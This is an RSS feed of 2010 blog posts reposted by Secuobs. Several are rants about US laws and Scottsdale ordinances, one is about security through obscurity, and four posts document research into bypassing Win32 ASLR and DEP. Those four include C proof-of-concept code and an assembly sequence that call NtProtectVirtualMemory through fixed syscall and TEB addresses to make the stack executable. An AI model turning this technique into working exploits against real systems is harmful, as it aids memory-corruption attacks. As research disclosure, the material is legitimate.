<item><title>good quote from an old forgotten book</title><description>Secuobs.com : 2010-04-16 18:59:48 - I recently came across this author, and have had serious problems locating many of his books because they're out-of-print and old, and really don't contain glitz and glam and meaningless crap, which is un-American. Anyways, I like this quote a lot and keep losing it, so I'm saving it here. Feel free to mull on its inherent truth:

"Although the legal and ethical definitions of right are the antithesis of each other, most writers use them as synonyms. They confuse power with goodness, and mistake law for justice." - Charles T. Sprading, Freedom and its Fundamentals

Another one I liked:

"It is not what a lawyer tells me I may do; but what humanity, reason, and justice tell me I ought to do." - Edmund Burke, Second Speech on Conciliation, 1775</description><link>http://www.secuobs.com/revue/news/213064.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/213064.shtml</guid></item>
<item><title>alienable unalienable rights</title><description>Secuobs.com : 2010-04-16 18:59:48 - Supposedly, our constitution grants us unalienable rights (such as the right to vote, the right to own a firearm, the right to a jury trial, et cetera); however, we've managed through the years to nitpick and lawyer our way around supposedly unalienable rights. For instance, felons lose a bazillion rights: you can't work in all sorts of jobs, in some states you can never regain your right to vote, in most you can never regain your right to own a firearm. You can't be a beneficiary on a will, et cetera. Sounds great when you think about murderers and violent offenders; you probably don't want them to have guns again. Then you realize there is no strict definition for felony. A felony could be a marijuana seed in your pocket as you passed through the Great Police State of Arizona (even though we've technically decriminalized it). See, they found a neat loophole: it's technically a felony even though you cannot actually ever see jail time for a first offense (assuming you don't violate probation later), but the definition of a felony is that it's a crime that you could go to jail for. So hey, let's just write into law that it's a felony, but that all courts will mark it undesignated, and then we can screw X percent of the people after they finish probation by not designating the offense, leaving them as basically felons. Or my favorite of the moment: you have the right to a jury trial, except unless the offense doesn't land you in jail for 6 months and 1 day, then it's a non-serious offense, except if you ask the prosecutor, who will say it's a serious offense, except it's not, because you don't get a jury trial, yet another inalienable right. I'm writing my list. I'm at number 5. When I come close to Jefferson's list, I will have reached my limit. This is bullshit and violates both the spirit and letter of the law. Furthermore, laws and practices that went into effect under presidents' executive orders et cetera, under presidents that were impeached (i.e. LBJ), should at least be reviewed. The federal government does not have the right to tell you whether you can or cannot take drugs, drink bleach, or eat sand; they've just decided over a hundred-plus years that actually they do.</description><link>http://www.secuobs.com/revue/news/213063.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/213063.shtml</guid></item>
<item><title>overstepping your bounds</title><description>Secuobs.com : 2010-04-16 18:59:48 - So. In the city/rolling-continuous suburb of Scottsdale, AZ the following acts are illegal:

0) Driving with muddy tires
1) Off-roading in non-dust-free areas, regardless of owner's consent (loophole: use electric vehicles/non-combustion engine)
2) On your property:
   a) Smoke
   b) Emit 'offensive odors' (farting)

Furthermore, you must maintain a 'Sonoran desert' landscape; you have to use gravel, bark, et cetera to cover your yard. If you're in an area zoned as R3 (medium residential or multi-residential), which is most people, you have to have three (3) trees, they must be at least 15 gallons in size and 50% of their maturity level. They must be a certain distance apart and cannot have an excessive amount of gravel, bark, et cetera. You cannot have weeds or uncultivated growth in your yard, front or back, and those bastards were smart enough to phrase the definition of weed as: "Weed means any uncultivated plant growth, including, but not limited to, bull thistle, cocklebur, foxtail, horseweed, lambs quarters, London rocket, mallow, milkweed, pigweed, mustards, prickly lettuce, ragweed, Russian thistle, tumbleweed, shepherds purse, sowthistle, white horsenettle, willow weed, and plant growth defined as noxious weeds in state statutes regardless of whether an owner or occupant regards the plant growth as desirable." So, there goes my defense that I'm cultivating them on purpose; apparently being a weed farmer is illegal (ironically enough, being a dirt farmer isn't, but being a manure farmer is). So why does this piss me off? Every time it rains Scottsdale turns into a frigging death trap: north Scottsdale has very few street lights, no sidewalks, nor any way for the roads to drain when it rains. Thus when it does rain, the roads flood horribly. How do they deal with this? They put up little signs about waist high that say 'CAUTION: FLOOD' that you can't see because it's fucking dark out and there's no street lights. So REALLY, there's an entire division of the city devoted to weed and grass enforcement, meanwhile every time it rains (a lot lately) I risk my life by driving down the road. I'm glad I don't pay you fuckers taxes.</description><link>http://www.secuobs.com/revue/news/213062.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/213062.shtml</guid></item>
<item><title>(old email) Win32 ASLR</title><description>Secuobs.com : 2010-04-16 18:59:48 - Here is a section of an email I wrote 17-Aug-2009 about something I had been playing with in my head for quite a while. I cannot for the life of me bring myself to type it all up in a coherent manner, so here is an email where I mostly described what I was talking about. The subject I sent the email to seemed to only get confused by what I was saying, no doubt a result of my poor phrasing/incoherent English. I have not re-read or proofread what I said, I just knew I could copy/paste it.

So, I'm not sure how much you know win32 stuff, but I stumbled across something interesting that I've figured out 3 out of 4 steps of, but hit a wall with the last one and figured I'd pick your brain and see what you thought.

So. At 0x7ffe0300 in all versions of Windows there is a pointer to the system call interface for Windows, NtKiFastSystemCall IIRC. Basically it points to:

    mov edx, esp
    sysenter

At 0x7ffe0304 is a pointer to the system call's ret. When you make a system call, you push the arguments onto the stack along with a return address for where the kernel should resume execution in ring-3. Furthermore, eax is used to pass the system call number to be executed. This holds true for all versions of Windows since something like XP, and this address remains fixed despite ASLR. This means that if you control eax and esp and can hit a vptr or function pointer of some sort, you know a way to make system calls.

It gets better though: at 0x7ffdf000 (if you didn't start the application in a debugger) is a pointer to a pointer to the SEH call chain (start of the TEB IIRC), thus you have a pointer to the stack and quite likely yourself (as having to control esp says you need a stack overflow usually). Knowing this, my initial plan was to return into NtProtectVirtualMemory(), which takes a pointer to the base address, and just then make the stack executable and then return into the stack to execute my code. The problem there is that, because of the necessity of a pointer on the stack of where to resume execution, all I have is a bunch of pointers to pointers; however, in addition to these other pointers, there are also pointers at 0x7f6f1cfc, 0x7f6f1d00 and 0x7f6f1d04 which exist inside of ntdll's code section and point to ret, retn 4 and retn 8 respectively. So my initial plan was to push a probably bogus address onto the stack for where to return on the system call (i.e. 0x0), call NtProtectVirtualMemory(), let the access violation trip SEH and then return into one of the retn's to take advantage of the structure passed to the SEH handler to get a pointer to the stack and execute there.

Of course the problem here is two-fold. The first is that I don't believe I can make the stack executable again under Vista and Win7 because they have that option that makes it where changing execution permissions is forbidden. Even more, SafeSEH stops me from returning into those ntdll addresses. So this leaves me at a bit of a loss: I can execute at least 1 system call, I have all of the pointers I should need to bootstrap myself, but I'm quickly running out of ideas. I've briefly started looking at NtFreeVirtualMemory() in hopes that maybe I can pass some malformed section of memory to it, but it seems unlikely to me that the kernel would be mucking about much in the section of memory it's toying with. I'd prefer, if at all possible, to avoid a ring-3 into ring-0 attack, but I'm not positive I have many other options left. If we/I/someone can get this last step working, we've made a pretty significant break of win32 ASLR. Did that all make sense? Any ideas? Feel free to share the concept with anyone you think appropriate.</description><link>http://www.secuobs.com/revue/news/213061.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/213061.shtml</guid></item>
<item><title>security through obscurity / redefining how you define security</title><description>Secuobs.com : 2010-04-16 18:59:48 - RE: http://www.nytimes.com/2010/03/21/world/asia/21grid.html

Way to miss the point, America. Look, security through obscurity is great for implementations, but horrible to depend on. Yes it makes it harder, but thinking no one is going to figure it out (especially when you consider how many ex-DOE people there are walking and talking) is just flat out stupid. Insecurity is, imho, best defined as "the flaws that exist in any given system (electronic or otherwise), regardless of whether your adversaries know about them or not". There are of course times where you have to make judgement calls and say 'X can wait until date Z' or similar, but you can't simply say things like: "Neither the authors of this article, nor any other prior article, has had information on the identity of the power grid components represented as nodes of the network ... Thus no practical scenarios of an attack on the real power grid can be derived from such work." Because, well, that's stupid. You're either saying that China couldn't possibly have access to the electronic components the paper is based on (ironic considering the electronics were probably made there in the first place), or that in essence "We are waiting for someone with a SCADA background to defect to [adversary_x]". I mean, *I* know some of that data just from proximity to people working with it, never mind if a well-financed adversary actually attempts to find out information; besides, they're already in your networks and I doubt the majority of necessary data is classified on SIPRNet and not on NIPRNet. A quote I liked that was fairly astute from the article was from the SecDev folks: "Once you start interpreting every move that a country makes as hostile, it builds paranoia into the system." This is incredibly true, as evidenced by the cold war. The key difference here, however, is that we're not talking about a nuclear holocaust; there is no mutually assured destruction, or at least we haven't hammered out the details of how to make that model fit here (assuming it even can).

That all said, to summarize my point:

    #ifdef INSECURITY
    #undef INSECURITY
    #define INSECURITY "the vulnerabilities that exist in any given system (electronic or otherwise), regardless of whether your adversary knows about them or not"
    #endif

    #ifdef SECURITY
    #undef SECURITY
    /* FIX YOUR BUGS, PERIOD. */
    /* LET OBSCURITY TAKE ITS NATURAL COURSE -- DON'T DEPEND ON IT */
    #define SECURITY !INSECURITY
    #endif</description><link>http://www.secuobs.com/revue/news/213060.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/213060.shtml</guid></item>
<item><title>win32 ASLR round 2</title><description>Secuobs.com : 2010-04-16 18:59:48 - Okay, I got around my initial problem with making the stack executable. Thankfully Windows is nice enough to give me the address of the top of the stack, and (at least per process/thread) the stack size is constant. I was wrong about what I said about not being able to make the stack executable, not sure what I was doing wrong, but I've got it working now. It's still a work in progress: namely, I need to figure out why the hell I can't pop in a static address to a PULONG of the stack size (for some reason that errors out), and then of course I need to fix the oldPerm variable. It's probably worth pointing out that calling NtProtectVirtualMemory() is essentially the same as setting up the arguments myself and call'ing 0x7ffe0300; it was just easier for testing this way. From memory, it just sets EAX to the right syscall number, copies 0x7ffe0300 to EDX, call's EDX, which in turn is just a stub that copies ESP to EDX and then. So, IRL, after I get the last couple kinks out, you would need to control EAX and ESP and gain execution control via a pointer to a pointer (i.e. a ret won't work, but like a vptr et cetera would). Code below:

<![CDATA[
/*
 * If you recompile this, your stack size (may) change,
 * in which case you would need to modify the sLen variable.
 * Otherwise, the binary/pdb file I used can be found at
 *   http://rapidshare.com/files/369369340/ASLR-round2.zip.html
 *   http://rapidshare.com/files/369369589/ASLR-round2.zip.html
 * let me know if I need to re-upload it or similar
 *
 * -jf
 */

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef DWORD (WINAPI *NTVPROT)(HANDLE, PVOID *, PULONG, ULONG, PULONG);

/* hands back the current esp in eax (MSVC inline asm, no explicit return) */
PVOID getsp(void)
{
    _asm { mov eax, esp }
}

int main(int argc, char **argv)
{
    HMODULE hNtdll  = NULL;
    NTVPROT ntVProt = NULL;
    DWORD   sLen    = 0x0000A000;
    DWORD   oldProt = 0x666a;
    PVOID   espPtr  = NULL;
    DWORD   retval  = 0;

    /*
     * If you're running this under a debugger, uncomment this so you can
     * attach to the process instead of starting it under a debugger
     * (some fixed addresses change when you start under a debugger).
     */
    /* for (unsigned int i = 0; i < (size_t)-1; i++) Sleep(1000); */

    hNtdll = LoadLibraryA("ntdll.dll");
    if (NULL == hNtdll) {
        fprintf(stderr, "%s\n", "XX LoadLibraryA(ntdll) failed");
        return EXIT_FAILURE;
    }

    ntVProt = (NTVPROT)GetProcAddress(hNtdll, "NtProtectVirtualMemory");
    if (NULL == ntVProt) {
        fprintf(stderr, "%s\n", "XX ntVProt == NULL");
        return EXIT_FAILURE;
    }

    /* drop a tiny stub (int3, int3, int3, ret) onto the stack */
    espPtr = getsp();
    espPtr = (BYTE *)espPtr + 512;
    memcpy(espPtr, "\xCC\xCC\xCC\xC3", 4);

    /*
     * XXX
     * Need to replace sLen and oldProt. In this binary the value
     * 0x0000A000 (stack size for binary) is found at
     *   0x000631e6, 0x000b033e, 0x000b1144, 0x000b1baa,
     *   0x000bbdb8, 0x000bf2fa, 0x000c27d2, 0x000c573f
     * However using any of those values returns an error,
     * which I'm not sure why. I'm gonna need to debug the
     * system call itself to figure out WTF is up.
     *
     * oldProt should be easy, there's a section of memory
     * at the end of the address space that's marked RW so
     * we (should) be able to pop in any old address we want
     * in there. (should.) Those addresses above (should) work.
     *
     * expected output: breakpoint, breakpoint, breakpoint, return 0
     */
    retval = ntVProt((HANDLE)-1,
                     (PVOID *)0x7ffdf008,
                     &sLen,
                     PAGE_EXECUTE_READWRITE,
                     &oldProt);

    _asm { call espPtr }

    return EXIT_SUCCESS;
}
]]></description><link>http://www.secuobs.com/revue/news/213059.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/213059.shtml</guid></item>
<item><title>win32 ASLR round 3</title><description>Secuobs.com : 2010-04-16 18:59:48 - Okay, got the arguments to the system call figured out; however, when I emulate the functionality of NtProtectVirtualMemory() and do a

    push [args]
    push [retaddr]
    mov eax, syscallnum
    mov ecx, 0x7ffe0300
    call dword ptr [ecx]

it errors out telling me the protections I specified are invalid (0xC0000045). Pretty sure it's just me misunderstanding something about how the argument stack is supposed to be set up, although it was my understanding that there should be 2x return addresses followed by the arguments. So, now I really need to debug the kernel. Which, I might add, is a fucking pain in the ass (i m i s s s o f t i c e). Once I unfuck whatever the problem is there (I'm fairly positive it's something I'm doing wrong), then it's just a matter of xfering control back to the stack.

A nice aspect of this is that if you are jumping to the syscall from like an overwritten function pointer, the call will put a valid return address onto the stack for you and the kernel will return back to the application, meaning you could do staged exploits, or potentially use whatever context the application is in to finagle a jmp [RWE-section-of-memory]. One interesting side note is that if you can do a push X / push X / jmp [Y] sequence, you can get the kernel to return to wherever you want, although it seems to be of limited use considering you needed a jmp in the first place. I guess the bigger point is that the kernel returns to 0x7ffe0304, which is a pointer to a ret, which is (not) going to be protected by a stack canary et cetera.

Anyways, slightly modified code/PoC demonstrating where I'm at below. It sets a few pages of memory at the (bottom) of the stack to be RWE. I did this because I had problems finding a size of 0x0000A000 at a static address; there are a ton inside some of the nls stuff, but the system call fails when I use that section of memory, and it seems to get mapped to one of two places, meaning its address changes about 50% of the time, making it mostly unsuitable anyways. At any rate, IRL this is going to be variable, as you'd like to have a section of memory you've written to be executable. That said, it's a PoC, and this point is somewhat irrelevant as stack sizes change, so while this is generic and (should) work across the board, IRL you're probably going to want to find something closer to the actual full length of your thread's stack size. Expected output is the same as last time: int 3, int 3, int 3, ret, return 0.

<![CDATA[
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef DWORD (WINAPI *NTVPROT)(HANDLE, PVOID *, PULONG, ULONG, PULONG);

int main(int argc, char **argv)
{
    HMODULE hNtdll  = NULL;
    NTVPROT ntVProt = NULL;
    PVOID   espPtr  = NULL;

    /*
     * If you're running this under a debugger, add a
     * while (x < y) Sleep(z); loop so you can attach
     * instead of starting under a debugger
     * (memory layout changes when started under a debugger).
     */

    hNtdll = LoadLibraryA("ntdll.dll");
    if (NULL == hNtdll) {
        fprintf(stderr, "%s\n", "XX LoadLibraryA(ntdll) failed");
        return EXIT_FAILURE;
    }

    ntVProt = (NTVPROT)GetProcAddress(hNtdll, "NtProtectVirtualMemory");
    if (NULL == ntVProt) {
        fprintf(stderr, "%s\n", "XX ntVProt == NULL");
        return EXIT_FAILURE;
    }

    /* stack pointer stored at TEB+8, backed off 128 bytes; stub is int3, int3, int3, ret */
    espPtr = (PVOID)*(PULONG)0x7ffdf008;
    espPtr = (BYTE *)espPtr - 128;
    memcpy(espPtr, "\xCC\xCC\xCC\xC3", 4);

    ntVProt((HANDLE)-1,
            (PVOID *)0x7ffdf008,        /* in/out: base address        */
            (PULONG)0x7ffdf010,         /* in/out: region size         */
            0x40,                       /* PAGE_EXECUTE_READWRITE      */
            (PULONG)0x7ffdffcc);        /* out: old protection         */

    _asm { call espPtr }

    return EXIT_SUCCESS;
}
]]></description><link>http://www.secuobs.com/revue/news/213058.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/213058.shtml</guid></item>
<item><title>win32 ASLR, round 4</title><description>Secuobs.com : 2010-04-16 18:59:48 - Okay, so... hah, it helps if you push all of the arguments onto the stack for the function you're calling. As soon as I noticed that, it mysteriously started working. There are some caveats: the TEB sometimes moves under a handful of conditions, first is if you start the process under a debugger, second is some conditions with multiple threads (although the TEBs are still at mostly guessable addresses if you know what thread you are), et cetera. When the TEB moves, it's still close by, and each thread will have its own, obviously. But:

    push 0x7ffdffcc    ; (out) old perms
    push 0x00000040    ; (in)  perms
    push 0x7ffdf010    ; (in)  size
    push 0x7ffdf008    ; (in)  addr
    push 0xffffffff    ; (in)  handle
    push 0x41414141    ; takes the slot of the caller's return address
    mov eax, 0xd7      ; NtProtectVirtualMemory
    mov edx, 0x7ffe0300
    call dword ptr [edx]
    ret

If you want to modify execution control on return from the system call, push another address up there and change the call dword ptr [edx] into a jmp.</description><link>http://www.secuobs.com/revue/news/213057.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/213057.shtml</guid></item>
</channel>
</rss>
 
